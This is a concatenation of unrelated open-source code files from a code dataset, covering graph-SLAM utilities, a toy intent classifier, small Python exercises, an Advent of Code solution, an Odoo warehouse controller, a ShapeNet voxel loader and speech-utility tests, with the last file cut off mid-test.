z_list = list(m[:,3])\n\n if len(z_list) > 2: # n or more measurements are required for triangulation\n if least_squares:\n Xl = ls.least_squares_klines(Xr, z_list) # Computing least squares best guess\n elif triangulation:\n Xl = tri.triangulation(Xr, z_list) # Computing triangulation best guess\n\n landmark = np.array([Xl[0,0], Xl[1,0]], dtype=np.float64)\n nodeType = 'VXY'\n nodeId = ID\n nodes[nodeId] = landmark\n nodeTypes[nodeId] = nodeType\n\n elif ID not in unused_lm:\n unused_lm.append(ID)\n\n del m\n return nodes, nodeTypes, unused_lm\n\n\ndef initial_bearing_guess(nodes, nodeFrom, nodeTo, nodeTypes, poseMeasurement, lm_status):\n\n x_b = nodes[nodeFrom]\n z_ij = poseMeasurement\n\n lm_status.update(dict([(nodeTo, False)]))\n \n for id, status in lm_status.items():\n if id == nodeTo and status == False:\n \n lambdadistx = 5\n lambdadisty = 5\n xguess = x_b[0]+lambdadistx*np.cos(wrap2pi(x_b[2]+z_ij))\n yguess = x_b[1]+lambdadisty*np.sin(wrap2pi(x_b[2]+z_ij))\n\n nodeType = 'VXY'\n nodeId = nodeTo\n landmark = np.array([xguess,yguess],dtype=np.float64) \n nodes[nodeId] = landmark\n nodeTypes[nodeId] = nodeType\n lm_status[nodeTo] = True\n\ndef check_parallel_lines(p1, z1, p2, z2, epsilon: float) -> bool:\n \"\"\"Checking for parallel lines\n\n Args:\n p1 (vector 3x1): Robot position at time i\n z1 (float): Bearing measurement at time i\n p2 (vector 3x1): Robot position at time j\n z2 (float): Bearing measurement at time j\n epsilon (float, optional): Threshold value. Parallax criterion. Defaults to 1.\n Returns:\n bool: True -> lines are parallel, False -> lines are not parallel\n \"\"\"\n n1 = wrap2pi(z1+p1[2])\n n2 = wrap2pi(z2+p2[2])\n\n diff = np.rad2deg(abs(wrap2pi(n1 - n2)))\n\n parallel = diff < epsilon\n\n return parallel","repo_name":"MJensen1231992/MSc_Proj_2021_SCL_MJ","sub_path":"graphSLAM/utils/g2o_loader.py","file_name":"g2o_loader.py","file_ext":"py","file_size_in_byte":8446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4661018489","text":"import nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nimport os\nimport json\nimport datetime\nimport numpy as np\nimport ml\nimport time\n\n\nERROR_THRESHOLD = 0.2\n# load our calculated synapse values\nsynapse_file = 'synapses.json' \nwith open(synapse_file) as data_file: \n synapse = json.load(data_file) \n synapse_0 = np.asarray(synapse['synapse0']) \n synapse_1 = np.asarray(synapse['synapse1'])\n\ndef classify(sentence, show_details=False):\n results = ml.think(sentence, show_details)\n\n results = [[i,r] for i,r in enumerate(results) if r>ERROR_THRESHOLD ] \n results.sort(key=lambda x: x[1], reverse=True) \n return_results =[[classes[r[0]],r[1]] for r in results]\n print (\"%s \\n classification: %s\" % (sentence, return_results))\n return return_results\n\nclassify(\"sudo make me a sandwich\")\nclassify(\"how are you today?\")\nclassify(\"talk to you tomorrow\")\nclassify(\"who are you?\")\nclassify(\"make me some lunch\")\nprint ()\nclassify(\"how was your lunch?\", show_details=True)","repo_name":"vikikkdi/College_Projects","sub_path":"web/f/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10660323668","text":"\"\"\"Escribe un programa que genere los primeros 4 números perfectos. Un número perfecto es un número entero \npositivo que es igual a la suma de sus divisores propios positivos. Dicho de otra forma, un número perfecto \nes aquel que es amigo de sí mismo. Así, 6 es un número perfecto porque sus divisores propios positivos son \n1, 2 y 3; y 6 = 1 + 2 + 3.\"\"\"\n\nnumeros_perfectos = []\nnum = 1\n\nwhile len(numeros_perfectos) < 4:\n suma = 0\n for i in range(1, num):\n if num % i == 0:\n suma += i\n if num == suma:\n numeros_perfectos.append(num)\n num += 1\n\nprint(\"Los primeros 4 números perfectos son:\")\n\nprint(numeros_perfectos)\n\n","repo_name":"RCNicolas/CAMPUS","sub_path":"Python/Ejercicios Review/Review 19 julio/Bucles/Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19756781940","text":"import fileinput\nimport math\nfrom copy import deepcopy\n\n\ndef parse():\n pairs = []\n for line in fileinput.input():\n pairs.append(eval(line.strip()))\n fileinput.close()\n return pairs\n\n\ndef set_in_pair_with_directions(root, directions, value):\n node = root\n for dir in directions[:-1]:\n node = node[dir]\n node[directions[-1]] = value\n\n\ndef get_inorder(root):\n regular_by_order = {}\n\n def inorder(pair, order=0, directions=None):\n if not directions:\n directions = []\n if isinstance(pair, int):\n regular_by_order[order] = (pair, directions)\n return order + 1, directions\n\n order, _ = inorder(pair[0], order, directions + [0])\n order, _ = inorder(pair[1], order, directions + [1])\n return order, directions\n\n pair = root\n inorder(pair)\n\n return regular_by_order\n\n\ndef traverse_explode(root):\n def recurse(pair, depth=0, order=0, has_exploded=False):\n if isinstance(pair, int):\n return order + 1, depth, has_exploded\n\n order, left_depth, has_exploded = recurse(\n pair[0], depth + 1, order, has_exploded\n )\n\n if left_depth == 5 and isinstance(pair, list):\n left, right = pair\n if isinstance(left, int) and isinstance(right, int) and not has_exploded:\n explode(root, left, right, order, regular_by_order)\n has_exploded = True\n\n order, right_depth, has_exploded = recurse(\n pair[1], depth + 1, order, has_exploded\n )\n\n return order, max(left_depth, right_depth), has_exploded\n\n regular_by_order = get_inorder(root)\n pair = root\n _, _, exploded = recurse(pair)\n return root, exploded\n\n\ndef traverse_split(root):\n def recurse(pair, has_splitted=False):\n if isinstance(pair, int):\n return has_splitted\n\n left_splitted = recurse(pair[0], has_splitted)\n\n if isinstance(pair[0], int) and pair[0] >= 10 and not has_splitted:\n pair[0] = [math.floor(pair[0] / 2), math.ceil(pair[0] / 2)]\n left_splitted = True\n\n right_splitted = recurse(pair[1], left_splitted)\n\n if isinstance(pair[1], int) and pair[1] >= 10 and not left_splitted:\n pair[1] = [math.floor(pair[1] / 2), math.ceil(pair[1] / 2)]\n right_splitted = True\n\n return left_splitted or right_splitted\n\n pair = root\n splitted = recurse(pair)\n return root, splitted\n\n\ndef explode(root, left, right, order, regular_by_order):\n if order > 1:\n leftmost, leftmost_directions = regular_by_order[order - 2]\n set_in_pair_with_directions(root, leftmost_directions, left + leftmost)\n\n if order < len(regular_by_order) - 1:\n rightmost, rightmost_directions = regular_by_order[order + 1]\n set_in_pair_with_directions(root, rightmost_directions, rightmost + right)\n _, exploded_directions = regular_by_order[order - 1]\n set_in_pair_with_directions(root, exploded_directions[:-1], 0)\n\n\ndef reduce(pair):\n pair, exploded = traverse_explode(pair)\n if exploded:\n return reduce(pair)\n\n pair, splitted = traverse_split(pair)\n if splitted:\n return reduce(pair)\n return pair\n\n\ndef sum_pairs(pairs):\n pair = pairs[0]\n for next_pair in pairs[1:]:\n pair = add_pairs(pair, next_pair)\n pair = reduce(pair)\n return pair\n\n\ndef add_pairs(a, b):\n return [a, b]\n\n\ndef magnitude(pair):\n left, right = pair\n left_magnitude = 3 * left if isinstance(left, int) else 3 * magnitude(left)\n right_magnitude = 2 * right if isinstance(right, int) else 2 * magnitude(right)\n return left_magnitude + right_magnitude\n\n\ndef simulate(pairs):\n magnitudes = []\n for i, x in enumerate(pairs):\n for j, y in enumerate(pairs):\n if i != j:\n magnitudes.append(magnitude(sum_pairs([deepcopy(x), deepcopy(y)])))\n magnitudes.append(magnitude(sum_pairs([deepcopy(y), deepcopy(x)])))\n return max(magnitudes)\n\n\ndef main():\n pairs = parse()\n pair = sum_pairs(pairs)\n print(f\"Part 1: {magnitude(pair)}\")\n\n pairs = parse()\n print(f\"Part 2: {simulate(pairs)}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rodrigorahal/advent-of-code-2021","sub_path":"18/snailfish.py","file_name":"snailfish.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"9997424281","text":"from openerp import http\n\n\nclass OutboundSelectPackageController(http.Controller):\n @http.route('/outbound_select_package', type='http', auth='user')\n def select_package(self, **kw):\n env = http.request.env\n current_user = env['res.users'].browse(http.request.uid)\n\n return http.request.render('stock_irm.outbound_select_package', {\n 'status': 'ok',\n 'user_name': current_user.partner_id.name,\n 'worklocation_name': current_user.work_location_id.name,\n 'worklocation_id': current_user.work_location_id.id or 0,\n 'title': 'Outbound Select Package',\n 'user_email': current_user.partner_id.email,\n\n })\n\n @http.route('/outbound_select_package/process_package', auth='user',\n type='json')\n def process_package(self, barcode):\n env = http.request.env\n\n unpack = False\n\n # cart = env['stock.location'].browse(cart_id)\n scanned_package = env['stock.quant.package'].search(\n [('barcode', '=', str(barcode))]\n )\n\n if not scanned_package:\n return {\n 'status': 'error',\n 'error': 'Error',\n 'message': 'The scanned package could not be found.',\n }\n\n bo_cart_to_band_down = env['stock.picking.type'].search(\n [('is_bo_cart_to_band_down', '=', True)], limit=1)\n\n output_to_customer = env['stock.picking.type'].search(\n [('is_output_to_customer', '=', True)], limit=1)\n\n bo_cart_upstairs = bo_cart_to_band_down.default_location_src_id\n\n output_default_loc = output_to_customer.default_location_src_id\n\n current_location = scanned_package.location_id\n\n if current_location not in bo_cart_upstairs.child_ids\\\n and current_location not in output_default_loc.child_ids\\\n and current_location != output_default_loc\\\n and current_location != bo_cart_upstairs:\n return {\n 'status': 'error',\n 'error': 'Error',\n 'message': 'The scanned package should not be on banddown.',\n }\n\n if current_location in output_default_loc.child_ids \\\n or current_location == output_default_loc:\n unpack = True\n\n quant = scanned_package.quant_ids[0]\n picking = quant.reservation_id.picking_id\n procurement_group = picking.group_id\n procurement_group._procurement_order_state()\n is_complete = procurement_group.is_sale_order_complete\n\n if picking.picking_type_id.id == output_to_customer.id:\n env['report'].print_document(\n picking, 'odw_report_delivery.report_delivery_master')\n\n wizard_id = picking.do_enter_transfer_details()['res_id']\n wizard = env['stock.transfer_details'].browse(wizard_id)\n destination = picking.location_dest_id\n\n wizard.write({\n 'item_ids': [(5, False, False)],\n 'packop_ids': [(5, False, False)]\n })\n\n # then create a new wizard item\n wizard_values = {\n 'package_id': scanned_package.id,\n 'destinationloc_id': destination.id,\n 'sourceloc_id': scanned_package.location_id.id,\n }\n\n wizard.write({\n 'packop_ids': [(0, False, wizard_values)]\n })\n\n wizard.sudo().do_detailed_transfer()\n\n if unpack:\n scanned_package.unpack()\n\n if is_complete and not unpack:\n scanned_package.auto_move_pack()\n\n return {'status': 'ok',\n 'is_complete': is_complete}\n\n @http.route('/outbound_select_package/get_package_ids', auth='user', type='json')\n def get_package_ids(self, cart_id):\n env = http.request.env\n cart = env['stock.location'].browse(cart_id)\n package_ids = env['stock.quant.package'].search(\n [('location_id', '=', int(cart.id))]\n )\n\n if not package_ids:\n return {\n 'status': 'error',\n 'error': 'Error',\n 'message': 'The cart does not contain any packages.',\n }\n\n package_list = []\n\n for package in package_ids:\n product = package.quant_ids[0].product_id\n quant = package.quant_ids[0]\n total_qty = 0\n for quant in package.quant_ids:\n total_qty += quant.qty\n\n package_list.append({\n 'package': {\n 'id': package.id,\n 'barcode': package.barcode,\n 'name': package.name,\n },\n 'product': {\n 'id': product.id,\n 'name': product.name,\n 'description': product.description or 'No description',\n 'quantity': total_qty,\n 'image': '/web/binary/image?model=product.product&id=%s&field=image' % product.id,\n }\n })\n\n return {'status': 'ok',\n 'package_ids': package_list,\n }\n","repo_name":"Niboo/legal1","sub_path":"stock_irm/controllers/outbound_select_package.py","file_name":"outbound_select_package.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"35300019269","text":"# ! change LOCAL to False before submitting !\n# set LOCAL to True for local testing\n\nLOCAL = True\n\nif LOCAL:\n class Node: \n def __init__(self, left=None, right=None, value=0): \n self.right = right\n self.left = left\n self.value = value\n\n\ndef print_range(node, l, r):\n if node == None:\n return\n if node.value >= l:\n print_range(node.left, l, r)\n if l <= node.value and r >= node.value:\n print(node.value)\n if node.value <= r:\n print_range(node.right, l, r)\n\n\ndef test():\n node1 = Node(None, None, 2)\n node2 = Node(None, node1, 1)\n node3 = Node(None, None, 8)\n node4 = Node(None, node3, 8)\n node5 = Node(node4, None, 9)\n node6 = Node(node5, None, 10)\n node7 = Node(node2, node6, 5)\n print_range(node7, 2, 8)\n # expected output: 2 5 8 8\n\n\nif __name__ == '__main__':\n test()","repo_name":"YourKeysAreMine/Basic_Algorithms","sub_path":"trees/K_show_range.py","file_name":"K_show_range.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40013794860","text":"import os\nimport warnings\nfrom os import path\nfrom typing import Dict\n\nimport torch\nfrom pytorch3d.datasets.shapenet.shapenet_core import ShapeNetCore\n\nfrom conversions.color_interpolation import interpolate_colors\nfrom conversions.colored_voxels import atlas2vertex_color\nfrom conversions.kaolin_mesh_to_voxels import fill, extract_surface, trianglemeshes_to_colored_voxelgrids\n\n\nclass ShapeNetVoxels(ShapeNetCore):\n def __init__(self, data_dir, synsets=None, filled=True) -> None:\n \"\"\"\n Loads pre-calculated voxels objects from ShapeNet, in binvox format\n Store each object's synset id and models id from data_dir. It uses Trimesh library to encode voxels.\n\n Args:\n data_dir: Path to ShapeNetCore data.\n synsets: List of synset categories to load from ShapeNetCore in the form of\n synset offsets or labels. A combination of both is also accepted.\n When no category is specified, all categories in data_dir are loaded.\n filled: internal part are filled\n \"\"\"\n super().__init__(data_dir=data_dir,\n synsets=synsets,\n version=2,\n load_textures=False,\n texture_resolution=1)\n from trimesh.exchange.binvox import load_binvox\n self.load_binvox = load_binvox\n\n self.filled = filled\n self.model_dir = path.join(\"models\", f\"model_normalized.{'solid' if self.filled else 'surface'}.binvox\")\n\n # Re-extract model_id, but for .binvox files\n self.synset_ids = []\n self.model_ids = []\n self.synset_num_models = {}\n for synset in self.synset_start_idxs.keys():\n for model in os.listdir(path.join(data_dir, synset)):\n if not path.exists(path.join(data_dir, synset, model, self.model_dir)):\n msg = (\"Object file not found in the model directory %s \"\n \"under synset directory %s.\"\n ) % (model, synset)\n warnings.warn(msg)\n continue\n self.synset_ids.append(synset)\n self.model_ids.append(model)\n model_count = len(self.synset_ids) - self.synset_start_idxs[synset]\n self.synset_num_models[synset] = model_count\n\n def __getitem__(self, idx: int) -> Dict:\n \"\"\"\n Read a model by the given index.\n\n Args:\n idx: The idx of the model to be retrieved in the dataset.\n\n Returns:\n dictionary with following keys:\n - voxel (str): voxel representation using Trimesh VoxelGrid class for encoding\n - synset_id (str): synset id\n - model_id (str): model id\n - label (str): synset label.\n \"\"\"\n model = self._get_item_ids(idx)\n model_path = path.join(\n self.shapenet_dir, model[\"synset_id\"], model[\"model_id\"], self.model_dir\n )\n with open(model_path, 'rb') as file_obj:\n model[\"voxel\"] = self.load_binvox(file_obj, resolver=None, axis_order='xzy', file_type=None)\n model[\"label\"] = self.synset_dict[model[\"synset_id\"]]\n return model\n\n\nclass RawVoxelsShapeNetDataset(ShapeNetCore):\n \"\"\"\n The voxels are calculated from the ShapeNet mesh in the same way as for the Pkmn dataset,\n to be able to use transfer learning between the 2. This also allows to include the color of the voxels.\n \"\"\"\n\n def __init__(self, root_path, n_cubes, synsets=None):\n super(RawVoxelsShapeNetDataset, self).__init__(root_path, synsets=synsets, version=2, load_textures=True,\n texture_resolution=4)\n self.n_cubes = n_cubes\n\n def __getitem__(self, item):\n x = super().__getitem__(item)\n verts = x[\"verts\"]\n faces = x[\"faces\"]\n atlas_texture = x[\"textures\"]\n\n # Min-max normalization in [-1, 1], centered in 0\n verts = (verts - verts.min(dim=0)[0]) / (verts - verts.min(dim=0)[0]).max()\n verts = 2 * (verts - verts.max(dim=0)[0] / 2)\n\n # We use vertex color on the initial mesh, so faces size must be small enough in comparison of voxel size\n v_colors = atlas2vertex_color(vertices=verts, faces=faces, atlas_texture=atlas_texture, use_mean=True)\n v_colors = (v_colors * 255).clamp(min=0, max=255).to(torch.uint8)\n\n voxels, colored_voxels = trianglemeshes_to_colored_voxelgrids(\n [verts], [faces], self.n_cubes, verts_uvs=None, textures=[v_colors],\n origin=torch.tensor([[-1., -1., -1.]]),\n scale=torch.tensor([2.]),\n return_sparse=False\n )\n voxels = fill(voxels)\n colored_voxels = interpolate_colors(colorgrid=colored_voxels,\n voxelgrid=extract_surface(voxels),\n darken_outside=True)\n\n return {'synset_id': x['synset_id'], 'model_id': x['model_id'], 'label': x['label'],\n 'voxelgrid': voxels[0], 'colorgrid': colored_voxels[0]}\n\n\ndef save_entire_shapenet_voxels_dataset_on_disk(root_path, voxels_folder, n_cubes=64, synsets=None):\n \"\"\"\n Pre-computes colored voxels of the ShapeNet dataset, and store them on disk. They can then be loaded\n by VoxelsDataset class (see pkmn_dataset.py)\n :param root_path: ShapeNet path\n :param voxels_folder: Folder path on which to save voxels\n :param n_cubes: Dimension of the voxel grid (total number of voxels = n_cubes*n_cubes*n_cubes)\n :param synsets: ShapeNet synsets, see Pytorch3d's ShapeNetCore\n \"\"\"\n from tqdm import tqdm\n d = RawVoxelsShapeNetDataset(root_path=root_path, n_cubes=n_cubes, synsets=synsets)\n for i in tqdm(range(len(d))):\n try:\n data = d[i]\n except Exception as e: # Some samples fails, so it just skip them\n print(i, e)\n continue\n new_name = path.join(voxels_folder,\n data['synset_id'] + '_' + data['model_id'] + '_' + data['label'] +\n '_nc' + str(int(n_cubes)) + '.pt')\n indices = extract_surface(data['voxelgrid'].unsqueeze(0)).squeeze(0).nonzero()\n colors = data['colorgrid']\n\n torch.save(f=new_name, obj=(indices, colors))\n","repo_name":"le-Greg/generate-voxel-pkmns-with-deep-learning","sub_path":"datasets/shapenet_voxels.py","file_name":"shapenet_voxels.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"17814187971","text":"import contextlib\nimport logging\nimport re\nimport tempfile\nimport typing as tp\nimport zipfile\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nimport pytest\nimport torch\nimport torchaudio\nfrom torchaudio.backend.common import AudioMetaData\n\nimport stopes.modules.speech.postprocess as sprocess\nimport stopes.modules.speech.utils as sputils\nfrom stopes.modules.speech.utils import Audio, AudioBytes, Text\n\n\n@pytest.fixture(scope=\"module\")\ndef sample_audio():\n with contextlib.ExitStack() as stack:\n tmpdir = stack.enter_context(tempfile.TemporaryDirectory())\n lll_data = torchaudio.datasets.LibriLightLimited(tmpdir, download=\"True\")[0]\n\n audio_path = tmpdir + \"/tmp.ogg\"\n torchaudio.save(audio_path, lll_data[0], lll_data[1], format=\"ogg\")\n num_frames = torchaudio.info(tmpdir + \"/tmp.ogg\").num_frames\n\n audio_zip_path = tmpdir + \"/tmp.zip\"\n zip_o = stack.enter_context(zipfile.ZipFile(audio_zip_path, \"w\"))\n with zip_o.open(\"tmp.ogg\", mode=\"w\") as sample_o:\n sample_start = int(sample_o._fileobj.tell()) # type: ignore[attr-defined]\n torchaudio.save(sample_o, lll_data[0], lll_data[1], format=\"ogg\")\n sample_end = int(sample_o._fileobj.tell()) # type: ignore[attr-defined]\n\n yield (audio_path, num_frames), (audio_zip_path, sample_start, sample_end)\n\n\ndef test_speech_utils_parse_audio(caplog: pytest.LogCaptureFixture) -> None:\n \"\"\"\n Expected audio formats (by priority):\n 1. full audio file: \n 2. time slice: |||\n 3. frame slice: \n \"\"\"\n # Invalid samples\n with pytest.raises(ValueError):\n # Too many parts\n sputils.parse_audio(\"path 10 15 20 30 40\")\n with pytest.raises(ValueError):\n # mixed space and pipe\n sputils.parse_audio(\"path 10|15 20\")\n with pytest.raises(ValueError):\n # start_not_int\n sputils.parse_audio(\"path start 10 15\")\n\n # Pipe separated (ms)\n with pytest.raises(RuntimeError):\n # no sample rate specified nor supplied\n sputils.parse_audio(\"path|10|15\")\n with assert_warns(\n caplog, match=\"Sampling factor not present in file, using provided value\"\n ):\n assert sputils.parse_audio(\"path|10|15\", sampling_factor=48) == Audio(\n \"path\", 480, 720, 48, sep=\"|\"\n )\n assert sputils.parse_audio(\"path|10|15|48\") == Audio(\"path\", 480, 720, 48, sep=\"|\")\n\n # Space separated (frames)\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n assert sputils.parse_audio(\"path 10 15\") == Audio(\"path\", 10, 15, 16, sep=\" \")\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n assert sputils.parse_audio(\"path 10 15\", 48) == Audio(\n \"path\", 10, 15, 16, sep=\" \"\n )\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n # with space separated, the 4-th column is a \"batch id\" not a sample rate\n assert sputils.parse_audio(\"path 10 15 32\") == Audio(\n \"path\", 10, 15, 16, sep=\" \"\n )\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n assert sputils.parse_audio(\"path 10 15 32\", 48) == Audio(\n \"path\", 10, 15, 16, sep=\" \"\n )\n\n # The warning is not outputted if you try a second time.\n assert caplog.messages == []\n assert sputils.parse_audio(\"path 10 15\") == Audio(\"path\", 10, 15, 16, sep=\" \")\n assert caplog.messages == []\n\n\n@pytest.mark.parametrize(\n \"sampling_factor,expected_output\",\n [\n (None, Audio(\"path\", 0, 43008, 16, sep=\"|\")),\n (8, Audio(\"path\", 0, 43008, 8, sep=\"|\")),\n ],\n)\ndef test_speech_utils_parse_audio_when_audio_path_exists(\n sampling_factor, expected_output\n):\n with patch(\"pathlib.Path.exists\", return_value=True):\n with patch(\n \"torchaudio.info\",\n return_value=AudioMetaData(\n sample_rate=16000,\n num_frames=43008,\n num_channels=1,\n bits_per_sample=32,\n encoding=\"PCM_F\",\n ),\n ):\n assert (\n sputils.parse_audio(\"path\", sampling_factor=sampling_factor)\n == expected_output\n )\n\n\n@pytest.mark.xfail()\ndef test_audio_duration() -> None:\n audio_frames = Audio(\"path\", 16_000, 32_000, 16, sep=\" \")\n audio_ms = Audio(\"path\", 1000, 2000, 16, sep=\"|\")\n # TODO: duration isn't correctly computed for Audio using ms as unit\n assert audio_frames.duration == audio_ms.duration\n\n\ndef test_speech_utils_parse_audio_or_text(caplog) -> None:\n # format 1: -> wav sampling\n # format 2: || -> ms sampling\n start = 10\n end = 15\n\n too_many_spaces = Text(\"path 10 15 20 30 40\")\n too_few_spaces = Text(\"path 10\")\n pipe_space_mixed = Text(\"path 10|15 20\")\n start_not_int = Text(\"path start 10 15\")\n audio_wav = Audio(path=\"path\", start=start, end=end, sampling_factor=16, sep=\" \")\n audio_ms = Audio(path=\"path\", start=start, end=end, sampling_factor=1, sep=\"|\")\n\n wav_string = str(audio_wav)\n ms_string = str(audio_ms)\n texts = [too_many_spaces, too_few_spaces, pipe_space_mixed, start_not_int]\n for text in texts:\n assert sputils.parse_audio_or_text(text.content) == text\n\n with pytest.raises(RuntimeError):\n sputils.parse_audio_or_text(\"path|10|15\")\n\n with assert_warns(\n caplog, match=\"Sampling factor not present in file, using provided value\"\n ):\n sputils.parse_audio_or_text(\"path|10|15\", sampling_factor=1)\n\n assert sputils.parse_audio_or_text(wav_string, sampling_factor=1) == audio_wav\n assert audio_wav.duration == audio_ms.duration / 16\n assert sputils.parse_audio_or_text(ms_string) == audio_ms\n\n\ndef test_speech_utils_convert_to_string() -> None:\n part1 = \"path 5 10 16\"\n part2 = \"path|100|120|16\"\n input_string = f\"1.5\\t{part1}\\t{part2}\"\n mined_result = sputils.split_mining_line(input_string)\n\n rev_part_1 = str(mined_result.src)\n rev_part_2 = str(mined_result.tgt)\n assert f\"{mined_result.score}\\t{rev_part_1}\\t{rev_part_2}\" == input_string\n\n\ndef test_compute_overlap() -> None:\n audio_1 = Audio(\"\", 0, 10)\n audio_2 = Audio(\"\", 15, 25)\n audio_3 = Audio(\"\", 5, 17)\n assert sputils.compute_overlap(audio_1, audio_2) == 0\n assert sputils.compute_overlap(audio_1, audio_2, sputils.IntersectMethods.IOU) == 0\n assert round(sputils.compute_overlap(audio_1, audio_3), 3) == round(5.0 / 12.0, 3)\n assert round(\n sputils.compute_overlap(audio_1, audio_3, sputils.IntersectMethods.IOU), 3\n ) == round(5.0 / 17.0, 3)\n\n\ndef test_postprocess() -> None:\n processor = sprocess.PostProcessAudioModule(\n sprocess.PostProcessAudioConfig(\n output_dir=Path(\"/\"),\n output_filename=\"test.tsv.gz\",\n mining_result_path=Path(\"/\"),\n min_audio_length=2,\n mining_threshold=1,\n max_overlap=0.1,\n )\n )\n # check filters on length and score\n audio_path = \"/path/to/example\"\n # valid:\n assert processor.line_passes_thresholds(\n sputils.MiningLineResult(\n score=1.1,\n src=Audio(audio_path, start=5, end=10, sampling_factor=1, sep=\" \"),\n tgt=Text(\"a\"),\n )\n )\n\n # score too low:\n assert not processor.line_passes_thresholds(\n sputils.MiningLineResult(\n score=0.9,\n src=Audio(path=audio_path, start=-100, end=0, sampling_factor=1, sep=\" \"),\n tgt=Text(\"b\"),\n )\n )\n # duration too small\n assert not processor.line_passes_thresholds(\n sputils.MiningLineResult(\n 1.1,\n Audio(audio_path, -1, 0, sampling_factor=1, sep=\" \"),\n Text(\"c\"),\n )\n )\n\n # check accurate removal of overlapping segments\n sources = {\n audio_path: [\n sputils.MiningLineResult(\n 1.1,\n Audio(audio_path, 5, 10, sampling_factor=1, sep=\" \"),\n Text(\"a\"),\n ),\n sputils.MiningLineResult(\n 1.2,\n Audio(audio_path, 6, 10, sampling_factor=1, sep=\" \"),\n Text(\"b\"),\n ), # score too low\n sputils.MiningLineResult(\n 1.1,\n Audio(audio_path, 6, 11, sampling_factor=1, sep=\" \"),\n Text(\"c\"),\n ), # too small fragment\n ]\n }\n filtered, _ = processor.postprocess(sources=sources)\n assert len(filtered) == 1\n assert filtered[0].tgt.content == \"b\" # type: ignore\n\n\ndef test_parse_audio_deprecated():\n assert sputils.parse_audio_deprecated(\"file.mp3\") == (\"file.mp3\", None, None, None)\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21\")\n\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421\") == (\n \"file.mp3\",\n 21,\n 421,\n None,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382 dummy\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 text\")\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 20\")\n assert sputils.parse_audio_deprecated(\"file.mp3 21 -1\") == (\n \"file.mp3\",\n 21,\n -1,\n None,\n )\n\n\ndef test_parse_audio_can_replace_deprecated(tmp_path: Path):\n assert sputils.parse_audio_deprecated(\"file.mp3\") == (\"file.mp3\", None, None, None)\n\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21\")\n\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421\") == (\n \"file.mp3\",\n 21,\n 421,\n None,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382 dummy\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 text\")\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 20\")\n assert sputils.parse_audio_deprecated(\"file.mp3 21 -1\") == (\n \"file.mp3\",\n 21,\n -1,\n None,\n )\n\n\ndef test_parse_audio_with_resample(sample_audio, caplog):\n audio_path, num_frames = sample_audio[0]\n start_ms, end_ms = 0, int(num_frames / 32)\n audio_text = f\"{audio_path}|{start_ms}|{end_ms}\"\n auto_meta = sputils.parse_audio_or_text(audio_text, sampling_factor=32)\n assert isinstance(auto_meta, Audio)\n\n with assert_warns(caplog, match=\"Audio has sample rate 16000. Resample to 32000\"):\n s = auto_meta.load()\n assert s.dim() == 2\n assert s.shape[1] == 351808\n\n\ndef test_parse_audio_bytes_with_resample(sample_audio, caplog):\n audio_zip_path, start, end = sample_audio[1]\n audio_text = f\"{audio_zip_path}:{start}:{end-start}\"\n auto_meta = sputils.parse_audio_or_text(audio_text, sampling_factor=32)\n assert isinstance(auto_meta, AudioBytes)\n\n with assert_warns(caplog, match=\"Audio has sample rate 16000. Resample to 32000\"):\n s = auto_meta.load()\n assert s.dim() == 2\n assert s.shape[1] == 351840\n\n\n@pytest.mark.parametrize(\"gpu\", [True, False])\n@pytest.mark.parametrize(\"fp16\", [True, False])\n@pytest.mark.parametrize(\"custom_read_func\", [True, False])\ndef test_load_audio_in_devices(sample_audio, gpu, fp16, custom_read_func, caplog):\n # TODO: move load_audio to speech_utils\n from stopes.modules.speech.speech_units import load_audio\n from stopes.modules.speech.utils import read_audio\n\n audio_path, num_frames = sample_audio[0]\n fake_read_func = lambda *a: torch.zeros(1) # noqa\n read_func = fake_read_func if custom_read_func else read_audio # ignore[assignment]\n line = f\"{audio_path}|0|{num_frames}|16\\tcoluimn2\"\n load_res = load_audio(\n 0, gpu, fp16, line, sampling_factor=32, read_audio_func=read_func # type: ignore[arg-type]\n )\n assert load_res[0] == line\n if custom_read_func:\n expected_wav = torch.zeros(1)\n if gpu and 